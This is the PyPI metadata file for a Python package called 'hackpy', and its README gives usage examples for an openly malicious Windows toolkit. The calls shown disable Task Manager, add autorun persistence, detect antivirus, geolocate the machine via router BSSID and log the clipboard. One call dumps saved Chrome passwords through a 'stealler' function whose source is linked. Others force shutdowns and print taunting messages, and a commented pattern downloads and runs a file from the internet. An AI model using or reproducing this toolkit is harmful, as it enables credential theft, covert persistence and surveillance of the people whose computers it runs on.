Metadata-Version: 2.1
Name: hackpy
Version: 0.0.7
Summary: Full description here: https://github.com/LimerBoy/hackpy/blob/master/README.MD
Home-page: https://github.com/LimerBoy/hackpy/blob/master/README.MD
Author: LimerBoy
Author-email: LimerBoyTV@gmail.com
License: MIT
Description: п»ї![Python](https://www.python.org/static/img/python-logo@2x.png)
        # `pip install hackpy`
        ![](https://picua.org/images/2019/07/02/a565a62aa7c27eb1339c6cb0be7c9d49.png)
        
        # Example usage:
        ``` python
        import os
        import hackpy
        
        hackpy.clean() # Remove all hackpy temp files from system
        hackpy.load(architecture=64) # default it 32
        
        hackpy.taskmanager.disable() # Disable windows taskmgr.exe
        hackpy.taskmanager.enable()  # Enable windows taskmgr.exe
        
        # TaskManager
        if hackpy.taskmanager.find('iexplore.exe') == True: # If process iexplore.exe found:
            hackpy.taskmanager.kill('iexplore.exe') # Stop iexplore.exe process,
            hackpy.taskmanager.start('chrome.exe') # start chrome.exe process
        
        
        # Autorun
        hackpy.autorun('C:\\Windows\\System32\\cmd.exe', 'test_name', state=True) # Add cmd.exe to startup
        hackpy.autorun('C:\\Windows\\System32\\cmd.exe', 'test_name', state=False) # Remove cmd.exe from startup
        
        # Detect installed antivirus software on computer:
        data = hackpy.detect_protection()
        for antivirus in data:
            print('[!] - Antivirus detected: ' + antivirus + ', install path: ' + data[antivirus])
        
        # Information about you IP:
        data = hackpy.ip_info()
        print('[?] - You IP is: ' + data['query'])
        print('[?] - You live in: ' + data['country'] + ', country code: ' + data['countryCode'])
        # Return dict: {"query", "status", "country", "countryCode", "region", "regionName", "city", "zip", "lat", "lon", "timezone", "isp", "org", "as", "local"}
        
        # Information about other IP:
        data = hackpy.ip_info('216.58.215.110')
        print('[?] - Other Information about IP:\n' + str(data))
        # Return dict: {"query", "status", "country", "countryCode", "region", "regionName", "city", "zip", "lat", "lon", "timezone", "isp", "org", "as"}
        
        # Get router bssid:
        bssid_string = hackpy.router() # BETA
        # Find LATITUDE and LONGITUDE with router BSSID:
        data = hackpy.bssid_locate(bssid_string)
        print('LATITUDE: ' + str(data['lat']) + ', LONGITUDE: ' + str(data['lon']) + ', RANGE: ' + str(data['range']))
        
        # Windows messagebox:
        hackpy.messagebox.error('LOL', 'System has been killed :D') # none, info, error and warning types
        
        # Nircmdc reference: https://nircmd.nirsoft.net
        hackpy.command.nircmdc('monitor off')
        hackpy.command.nircmdc('speak text \"HAHAHAHAHHAH IM FIND YOU!\"')
        # System commands
        hackpy.command.system('shutdown -s -t 260')
        
        # SendKeyPress:
        hackpy.sendkey('Hello bro{ENTER}')
        #Other keys: https://pastebin.com/Ns3P7UiH
        
        # Get text from clipboard:
        data = hackpy.clipboard.get()
        print('Text in clipboard is ' + data)
        
        # Save all РЎhrome passwords to passwords.txt
        hackpy.stealler() # Stealler source code: https://pastebin.com/V28aPdZH
        
        # Set text to clipboard:
        hackpy.clipboard.set('Hello from LimerBoy and HackPy!!')
        
        # Clipboard logger:
        hackpy.clipboard.logger('clip_logs.txt') # Log ALL clipboard changes.
        # It is recommended to use with threading !!!
        
        # Download python and install it:
        hackpy.install_python('3.6.0', path = 'C:\\python36') # Default version is 3.7.0 and install path is C:\python37
        
        # Load and execute file from internet
        # file = hackpy.wget(direct.link.here)
        # os.startfile(file)
        ```
        
        <br> *nircmdc reference: https://nircmd.nirsoft.net* <br>
        
        ![SITE](https://i.ibb.co/znRLN0D/image.png)
        
Platform: UNKNOWN
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: Microsoft :: Windows
Description-Content-Type: text/markdown
